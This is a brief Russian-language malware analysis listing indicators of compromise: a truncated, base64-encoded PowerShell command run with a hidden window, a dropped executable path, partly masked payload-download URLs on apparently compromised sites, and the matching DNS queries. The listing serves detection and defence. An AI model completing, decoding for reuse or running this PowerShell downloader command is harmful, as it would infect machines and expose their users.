Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABEAHcAZQA0AHUAeQBoAD0AKAAoACcASAAnACsAJwBqADQAJwApACsAKAAnAGkAJwArACcAeAA2AHYAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAE4AdgA6AHUAcwBlAFIAUA...
- %HOMEPATH%\z3nscrg\v04r_o1\qigikm9u0.exe
- %HOMEPATH%\z3nscrg\v04r_o1\qigikm9u0.exe
- %HOMEPATH%\z3nscrg\v04r_o1\qigikm9u0.exe
- http://3i###ics.net/dprj/serviceapi/TU/
- http://ca####nderlust.com/wp-includes/zgz0N/
- http://ca####nderlust.com/cgi-sys/suspendedpage.cgi
- http://co###etchup.com/wp-content/uploads/Dedzk1U/
- http://da###iasons.com/images/1sWs7WMJUW/
- http://zw##ish.com/lagais/w/
- http://www.hn##yq.com/wp-content/wEr/
- http://gn#######aldeconsultores.com/videos/wMS0CC2H/
- DNS ASK 3i###ics.net
- DNS ASK ca####nderlust.com
- DNS ASK co###etchup.com
- DNS ASK da###iasons.com
- DNS ASK zw##ish.com
- DNS ASK hn##yq.com
- DNS ASK gn#######aldeconsultores.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABEAHcAZQA0AHUAeQBoAD0AKAAoACcASAAnACsAJwBqADQAJwApACsAKAAnAGkAJwArACcAeAA2AHYAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAE4AdgA6AHUAcwBlAFIAUA...' (со скрытым окном)